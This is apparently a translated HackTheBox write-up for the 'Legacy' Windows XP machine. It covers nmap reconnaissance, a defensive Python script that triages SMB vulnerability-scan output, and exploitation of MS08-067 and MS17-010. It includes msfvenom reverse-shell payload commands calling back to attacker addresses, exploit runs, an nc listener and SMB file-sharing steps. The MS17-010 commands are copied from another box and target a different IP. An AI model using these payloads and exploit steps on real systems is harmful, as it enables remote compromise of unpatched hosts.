HTB Lab Series: Windows Machine: Legacy



Reconnaissance

Standard nmap scans

root@kali# nmap 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:30 EST
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 13.43 seconds

root@kali# nmap -sU -p- --min-rate 10000 -oA nmap/alludp 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:34 EST
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65534 open|filtered ports
PORT    STATE SERVICE
137/udp open  netbios-ns

Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds

root@kali# nmap -sC -sV -p 139,445 -oA nmap/scripts 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 13:37 EST
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).

PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -4h08m26s, deviation: 1h24m51s, median: -5h08m26s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b2:7b:09 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-02-19T17:29:16+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 257.42 seconds

445 SMB

Let's see what files the shares expose.

Start with smbmap. I'll publish a usage guide for SMB soon, stay tuned.

root@kali# smbmap -H 10.10.10.4
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.4...
[+] IP: 10.10.10.4:445  Name: 10.10.10.4
        Disk                                                    Permissions
        ----                                                    -----------
[!] Access Denied

root@kali# smbclient -N -L //10.10.10.4
session setup failed: NT_STATUS_INVALID_PARAMETER

Both attempts are denied: the host does not allow an unauthenticated (null) session to list shares.

Vuln scan

root@kali# nmap -p 445 --script vuln 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 13:27 EST
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 5.49 seconds

The scan shows the host is exposed to two very well-known vulnerabilities, MS08-067 and MS17-010.
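As an added example (not nmap's code and not part of the original writeup), the script below turns the "Host script results" block of nmap's normal output into a triage list, covering both the smb-security-mode result from the -sC scan above and the smb-vuln-* results from the vuln scan here. It flags every smb-vuln-* script whose State is VULNERABLE together with the CVE ids, keeps scripts that errored (like smb-vuln-ms10-061 above) as "rerun" so they are not mistaken for clean results, and raises a warning when message signing is not required. The Finding class and the severity labels are my own; the sample input is constructed from the two scan excerpts quoted in this writeup, trimmed and merged.

```python
"""Triage the "Host script results" block of nmap's normal output.

Added example for this writeup (not nmap's code and not the original
author's): turns NSE smb-vuln-* / smb-security-mode output into findings.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# A script header line looks like "| smb-vuln-ms08-067:" or "|_nbstat: value";
# body lines are indented further ("|   State: VULNERABLE", "|_  message_signing: ...").
SCRIPT_HEADER = re.compile(r"^\|_? ?([A-Za-z0-9][\w-]*):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
VULNERABLE_RE = re.compile(r"State:\s*(?:LIKELY\s+)?VULNERABLE")


@dataclass
class Finding:
    script: str
    severity: str          # "critical", "warning", "rerun" or "info" (labels chosen here)
    detail: str
    cves: list[str] = field(default_factory=list)


def parse_host_scripts(text: str) -> dict[str, list[str]]:
    """Map each NSE script name in the Host script results block to its body lines."""
    scripts: dict[str, list[str]] = {}
    current = None
    in_block = False
    for raw in text.splitlines():
        if raw.startswith("Host script results:"):
            in_block = True
            continue
        if not in_block:
            continue
        if not raw.startswith("|"):
            if current is not None:   # first non-"|" line after the block ends it
                break
            continue
        header = SCRIPT_HEADER.match(raw)
        if header:
            current = header.group(1)
            scripts[current] = [header.group(2)] if header.group(2) else []
        elif current is not None:
            body = raw[1:].lstrip("_").strip()
            if body:                  # skips the bare "|" spacer lines
                scripts[current].append(body)
    return scripts


def triage(text: str) -> list[Finding]:
    """Classify each script result; errors stay visible instead of reading as 'clean'."""
    findings: list[Finding] = []
    for name, body in parse_host_scripts(text).items():
        joined = "\n".join(body)
        if name.startswith("smb-vuln-"):
            if body and body[0].startswith("ERROR"):
                findings.append(Finding(name, "rerun", body[0]))
            elif VULNERABLE_RE.search(joined):
                cves = sorted(set(CVE_RE.findall(joined)))
                findings.append(Finding(name, "critical", "NSE check reports VULNERABLE", cves))
            elif body and body[0].lower() == "false":
                findings.append(Finding(name, "info", "not vulnerable"))
            else:
                findings.append(Finding(name, "info", "no determination"))
        elif name == "smb-security-mode":
            mode = re.search(r"message_signing:\s*(\S+)", joined)
            if mode and mode.group(1) != "required":
                findings.append(Finding(name, "warning",
                                        f"SMB message signing is {mode.group(1)}; "
                                        "require signing to stop relay and tampering"))
    return findings


# Constructed sample: the two scan excerpts quoted in this writeup, trimmed and
# merged so that one run exercises every branch above.
SAMPLE_OUTPUT = """\
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|
|     Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH

Nmap done: 1 IP address (1 host up) scanned in 5.49 seconds
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_OUTPUT):
        print(f"[{f.severity:8}] {f.script}: {f.detail} {' '.join(f.cves)}".rstrip())
```

Run it on a saved `-oN` file by replacing SAMPLE_OUTPUT with the file's contents; the "rerun" severity is the important design choice, since an NSE script that fails says nothing about the host and should be re-run with -d rather than counted as a pass.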

Then just hit it with msf; we'll look at the manual way afterwards.

Bing hasn't been much use lately, I can't find the exploit, and Baidu won't let me search for it either.

One more thing: msf cannot auto-match the target here, so you have to pick the target manually. The sixth one worked for me: target Windows XP SP3, language: English.

That's it.

Getting SYSTEM

MS08-067

Using the PoC at raw.githubusercontent.com/jivoi/pente…

The script documents its own usage in detail; I'll translate it here.

First, generate the payload with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Then you need to guess the target's OS version. The script's usage text lists the options:

# Usage text as printed by MS08_067_2018.py (Python 2 syntax)
print '\nUsage: %s <target ip> <os #> <Port #>\n' % sys.argv[0]
print 'Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445'
print 'Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)'
print 'Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal'
print 'Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English'
print 'Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)'
print 'Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)'
print 'Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)'
print ''
print 'FYI: nmap has a good OS discovery script that pairs well with this exploit:'
print 'nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1'

It suggests using nmap to fingerprint the OS version, but our earlier recon did not pin down the exact version, so we can only guess. The answer is option 6, i.e. Windows XP SP3 English (NX).

Now run the script:

root@kali# python ms08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################

$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .

#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

Remember to have nc listening first to catch the shell.

root@kali# python ms08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################

$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .

#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

Done.

MS17-010

I won't go into detail; the process is exactly the same as in my Blue writeup. If you are preparing for the OSCP, I recommend not using msf and instead using the manual method from my Blue writeup.

Manual

Use the Python scripts from GitHub – helviojunior/MS17-010

From that repository I use send_and_execute.py to upload our reverse-connection payload.

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f exe -o backdoor.exe

That creates the payload.

python send_and_execute.py 10.10.10.40 backdoor.exe

Then run it with python.

Finally, have an nc listener open:

nc -lvnp 4444

I copy-pasted this part directly (from the Blue writeup).

Post-exploitation

One thing worth mentioning: the XP file system layout differs a bit from Windows 7 and later.

User profiles live in a folder in the root directory called "Document and" something; hopefully you won't end up unable to find the Desktop.

Also, many of the commands we are used to are not available on XP, whoami for example, so we can share one out over SMB:

root@kali# smbserver.py a /usr/share/windows-binaries/
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Like that.

Then on the target host:

C:\WINDOWS\system32>\\10.10.14.14\a\whoami.exe
NT AUTHORITY\SYSTEM

That's the end of today's article, HTB Lab Series: Windows Machine: Legacy. Thanks for reading.

Please keep the source when reposting: https://bianchenghao.cn/21835.html
